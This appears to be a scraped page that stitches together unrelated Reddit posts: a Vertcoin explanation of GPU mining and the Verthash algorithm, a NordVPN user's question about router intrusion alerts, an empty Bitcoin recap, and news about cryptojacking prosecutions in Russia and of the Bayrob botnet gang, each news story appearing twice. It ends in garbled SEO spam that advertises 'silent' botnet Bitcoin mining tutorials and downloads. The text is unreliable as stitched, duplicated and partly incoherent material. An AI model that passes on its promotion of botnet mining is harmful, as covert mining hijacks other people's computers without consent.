If mining were just a spade sure, use the most powerful equipment which would be an ASIC. The problem is ASICs are not widely available, and just happen to be controlled by a monopoly in China.
So, you want the most widely available tool that produces a fair amount of hashrate, which currently manifests itself as a Graphics Card.
CPUs would be great too but unfortunately there are viruses that take over hundreds of thousands of computers called Botnets (they’re almost as bad as ASICs).

Mining In Pools

Because mining is a race, it’s difficult for an individual miner to acquire enough computational power to win this race solo. Therefore there’s a concept called pool-mining. With pool-mining, miners cooperate in finding the correct Proof-of-Work for the block, and share the block reward based on the work contributed. The amount of work contributed is measured in so-called shares. Finding the Proof-of-Work for a share is much easier than finding it for a block, and when the cooperating miners find the Proof-of-Work for the block, they distribute the reward based on the number of shares each miner found. Vertcoin always recommends using P2Pool to keep mining as decentralized as possible.
How Do I Get Started?
If you want to get started mining, check out the Mine Vertcoin page.

Vertcoin just forked to Lyra2REv3 and we are currently working on Verthash

Verthash is and was under development before we decided to hard fork to Lyra2REv3. While Verthash would’ve resulted in the same effect for ASICs (making them useless for mining Vertcoin), the timeline was incompatible with the desire to get rid of ASICs quickly. Verthash is still under development and tries to address the outsourcability problem.
Verthash is an I/O bound algorithm that uses the blockchain data as input to the hashing algorithm. It therefore requires miners to have all the blockchain data available to them, which is currently about 4 GB of data. By making this mining data mandatory, it will become harder for auto profit switching miners — like the ones that rent out their GPU to Nicehash — because they will need to keep a full node running while mining other algorithms for the moment Verthash becomes more profitable — the data needs to be available immediately since updating it can take a while.
Over the past month, we have successfully developed a first implementation of Verthash in the Vertcoin Core code base. Within the development team we have run a few nodes on Testnet to test the functionality — and everything seems to work properly. The next step is to build out the GPU miners for AMD and Nvidia. This is a NOETA at the moment, since we’re waiting on GPU developers which are in high demand. Once the miners are ready, we’ll be releasing the Vertcoin 0.15 beta that hardforks the testnet together with the miners for the community to have a testrun. Given the structural difference between Lyra2RE and Verthash, we’ll have to run the testnet for a longer period than we did with the Lyra2REv3 hard fork. We’ll have to make sure the system is reliable before hardforking our mainnet. So the timeline will be longer than with the Lyra2REv3 hard fork.
Some people in the community have voiced concerns about the fact that Verthash development is not being done “out in the open”, i.e.: the code commits are not visible on Github. The main two reasons for us to keep our cards to our chest at this stage are: (1) only when the entire system including miners has been coded up can we be sure the system works, we don’t want to release preliminary stuff that doesn’t work or isn’t secure. Also (2) we don’t want to give hardware manufacturers or mining outsourcing platforms a head start on trying to defeat the mechanisms we’ve put in place.

Links and Resources

· Twitter: https://twitter.com/Vertcoin
· Donations: vertcoin.org/donate
· Join our Discord: https://discord.gg/vertcoin
· Reddit: https://www.reddit.com/vertcoin/
· Official Website: https://vertcoin.org/
· Facebook: https://www.facebook.com/vertcoin
· Vertcoin Talk: https://soundcloud.com/vertcoin-talk
· Youtube: https://www.youtube.com/vertcoin
submitted by Canen01 to gpumining [link] [comments]

Intrusion Alerts to actual IP even when connected to VPN

So I've been a NordVPN customer since July of '17 and have experienced what I consider the best protection, confidence in anonymity, as well as ease of use. That said, there's a lot I don't understand. The reason for this post is because I'm being alerted of some ip addresses known for bad behavior, being blocked by my router. I'm getting A LOT of alerts and I don't know if it's normal or not. The curious thing is that the in the alert the DESTINATION is my public IP address from my provider.
Basically, someone's knocking on the doors of my real public IP address and I need to assess the threat. How can that be when I have NordVPN and my real IP address is supposed to be blocked?
Details on the intrusion, if it matters: Asus Router AC-3200
The Two-Way Intrusion Prevention System protects any device connected to the network from spam or DDoS attacks. It also blocks malicious incoming packets to protect your router from network vulnerability attacks, such as Shellshocked, Heartbleed, Bitcoin mining, and ransomware. Additionally, Two-Way IPS detects suspicious outgoing packets from infected devices and avoids botnet attacks.
The Exploits Blocked:
Exploit netcore router backdoor access
Exploit Remote Command Execution via shell script -2
submitted by Thilky to nordvpn [link] [comments]

r/Bitcoin recap - April 2019

Hi Bitcoiners!
I’m back with the 28th monthly Bitcoin news recap.
For those unfamiliar, each day I pick out the most popularelevant/interesting stories in Bitcoin and save them. At the end of the month I release them in one batch, to give you a quick (but not necessarily the best) overview of what happened in bitcoin over the past month.
You can see recaps of the previous months on Bitcoinsnippets.com
A recap of Bitcoin in April 2019
Adoption
Development
Security
Mining
Business
Education
Archeology (Financial Incumbents)
Price & Trading
Fun & Other
submitted by SamWouters to Bitcoin [link] [comments]

2 Russian Nationals Charged With Mining Crypto on State Computers

Two Russian nationals are being prosecuted for allegedly crypto mining on Russian government-owned computer systems, state news agency TASS reported Monday.
"In Russia, there have been two cases recently when people were brought to criminal responsibility for getting access to computers [of state organizations] and using them to mine cryptocurrencies," TASS quotes Nikolay Murashov, deputy director of the National Coordination Center for Computer Incidents, as saying during a press conference.
According to the TASS report, one of the nationals is a resident of Kurgan who used almost a whole botnet in various regions of the country. A criminal case was initiated against a second national for using the site of JSC Rostovvodokanal for mining. The report gives few other details but quotes Murashov as saying the attackers "infected" web pages and mined crypto currency at the moment the pages were viewed in the browser.
Murashov said companies must be on the lookout for suspicious activity on their networks, even if no activity is immediately detected.
"Up to 80 percent of the computer’s free power can be used to generate virtual coins, and a legitimate user may not even know about it," he said.
Unsanctioned crypto mining schemes have flourished in Russia. County governments have found operations lurking on their servers, as have airports and oil transport companies.
In October, three nuclear scientists were convicted and penalized for illegally mining bitcoin in the Sarov lab, where the former Soviet Union developed its first nuclear bombs.
The government claims crypto mining is widespread. In 2017 a top technology advisor to President Vladimir Putin estimated that 20 percent to 30 percent of devices “are infected with” crypto mining viruses.
Russian cybersecurity experts and some in the government have called that figure bogus.
submitted by SilkChain to SilkNews [link] [comments]

Cryptojacking Malware Devs Sentenced to 20 Years in Prison

Group leader Bogdan Nicolescu and co-conspirator Radu Miclaus were sentenced to 20 and 18 years respectively after being found guilty on 21 different counts of wire fraud, money laundering aggravated identity theft and other crimes, a press release announced Friday. The gang was also accused of developing malware which mined bitcoin and monero using their host computers' processing power.
Tiberiu Danet, a third Bayrob Group member, pleaded guilty in Nov. 2018 to eight charges. His sentencing is scheduled for Jan. 8.
From its founding in 2007 to its members’ apprehension and eventual extradition in late 2016, the Bayrob Group, which operated out of Bucharest, Romania, ran a sprawling hacking and malware operation. They deployed trojan malware in seemingly mundane emails from well-known companies and groups, but when victims attempted to download attachments apparently from Norton, the IRS and Western Union, their computers instead became infected with the Bayrob botnet, according to an indictment.
The botnet allowed its Romanian handlers to steal $4 million total, prosecutors claimed.
The botnet also installed crypto mining software, according to the July 2016 indictment. And it was not discreet; the Bitcoin and Monero mining operation hogged hosts’ processing power.
“Once a bot was instructed to mine for cryptocurrency, much of its processing speed and power would be unavailable to its legitimate owner.”
Bayrob also scanned for and transferred ownership of victims’ crypto wallets, if they had one.
submitted by SilkChain to u/SilkChain [link] [comments]

2 Russian Nationals Charged With Mining Crypto on State Computers

Two Russian nationals are being prosecuted for allegedly crypto mining on Russian government-owned computer systems, state news agency TASS reported Monday.
"In Russia, there have been two cases recently when people were brought to criminal responsibility for getting access to computers [of state organizations] and using them to mine cryptocurrencies," TASS quotes Nikolay Murashov, deputy director of the National Coordination Center for Computer Incidents, as saying during a press conference.
According to the TASS report, one of the nationals is a resident of Kurgan who used almost a whole botnet in various regions of the country. A criminal case was initiated against a second national for using the site of JSC Rostovvodokanal for mining. The report gives few other details but quotes Murashov as saying the attackers "infected" web pages and mined crypto currency at the moment the pages were viewed in the browser.
Murashov said companies must be on the lookout for suspicious activity on their networks, even if no activity is immediately detected.
"Up to 80 percent of the computer’s free power can be used to generate virtual coins, and a legitimate user may not even know about it," he said.
Unsanctioned crypto mining schemes have flourished in Russia. County governments have found operations lurking on their servers, as have airports and oil transport companies.
In October, three nuclear scientists were convicted and penalized for illegally mining bitcoin in the Sarov lab, where the former Soviet Union developed its first nuclear bombs.
The government claims crypto mining is widespread. In 2017 a top technology advisor to President Vladimir Putin estimated that 20 percent to 30 percent of devices “are infected with” crypto mining viruses.
Russian cybersecurity experts and some in the government have called that figure bogus.
submitted by SilkChain to u/SilkChain [link] [comments]

Cryptojacking Malware Devs Sentenced to 20 Years in Prison

Group leader Bogdan Nicolescu and co-conspirator Radu Miclaus were sentenced to 20 and 18 years respectively after being found guilty on 21 different counts of wire fraud, money laundering aggravated identity theft and other crimes, a press release announced Friday. The gang was also accused of developing malware which mined bitcoin and monero using their host computers' processing power.
Tiberiu Danet, a third Bayrob Group member, pleaded guilty in Nov. 2018 to eight charges. His sentencing is scheduled for Jan. 8.
From its founding in 2007 to its members’ apprehension and eventual extradition in late 2016, the Bayrob Group, which operated out of Bucharest, Romania, ran a sprawling hacking and malware operation. They deployed trojan malware in seemingly mundane emails from well-known companies and groups, but when victims attempted to download attachments apparently from Norton, the IRS and Western Union, their computers instead became infected with the Bayrob botnet, according to an indictment.
The botnet allowed its Romanian handlers to steal $4 million total, prosecutors claimed.
The botnet also installed crypto mining software, according to the July 2016 indictment. And it was not discreet; the Bitcoin and Monero mining operation hogged hosts’ processing power.
“Once a bot was instructed to mine for cryptocurrency, much of its processing speed and power would be unavailable to its legitimate owner.”
Bayrob also scanned for and transferred ownership of victims’ crypto wallets, if they had one.
submitted by SilkChain to SilkNews [link] [comments]

Botnet: Silent Bitcoin Mining - Tutorial + downloads! [Pool Support] 7 DAY$-24/HR$ - BITCOIN MINING EXPERIMENT - See How Much ... Botnet Silent Bitcoin Mining Tutorial + downloads! Pool Support 22 How to mine bitcoins (solo mining) with the core client ... Botcoin: Bitcoin-mining on botnets (NDSS '14 talk)

Using bots for Bitcoin mining. Cryptocurrencies would take over transactions in the future. Out of the cryptocurrencies that can be found out there, Bitcoin holds a prominent place. However, Bitcoin mining has become some sort of a challenge. This has tempted engineers to seek the assistance of latest technology for Bitcoin mining. That’s where they paid attention towards Internet of Things ... Botnet operators have been utilizing bitcoin mining for over a year now, and it’s getting a lot less profitable for the bottom dwellers. Even major botnets such as ZeroAccess appear to have (for ... Botnet mining is the practice of using hijacked processing power from other people's internet-connected devices to mine cryptocurrency. Since Bitcoin mining became more widespread, computers that are specialized for that kind of activity have become available as well. In 2014, we were assured that you couldn’t mine Bitcoin or any other currency using botnets. As we know, botnets are often auctioned at all-time low prices, and anyone can buy them to mine Bitcoin. The Stantinko botnet, which is thought to have infected at least 500,000 devices worldwide, has now added cryptomining to its toolset — and it’s been using YouTube to evade detection.

[index] [43584] [16851] [48963] [37291] [10491] [29672] [45955] [15725] [4169] [30019]

Botnet: Silent Bitcoin Mining - Tutorial + downloads! [Pool Support]

*****UPDATE***** Solo mining has been removed from client. I'll keep the video up for how it used to work, it might still work for some alt coins (unsure) yo... This video goes over my 7 day 1 week Bitcoin Mining experiment. I let my computer Mine for Bitcoin for a week straight, to see how much money I could generat... A post explaining how bitcoins work, an idea of how botnets would mine for you and a proof of concept of the idea! The post contains downloads to TweMiner and kMiner V2! TweMiner is a botnet-miner ... What it really takes to mine a Bitcoin in 10 Minutes. Firstly I'll show you a special free method to mine Bitcoin and send funds directly to your wallet in 1... bitcoin mining bot, bitcoin mining botnet, bitcoin miner computer, bitcoin miner cooling, bitcoin miner china, bitcoin miner channel, bitcoin miner components, bitcoin miner cloud, bitcoin miner ...

#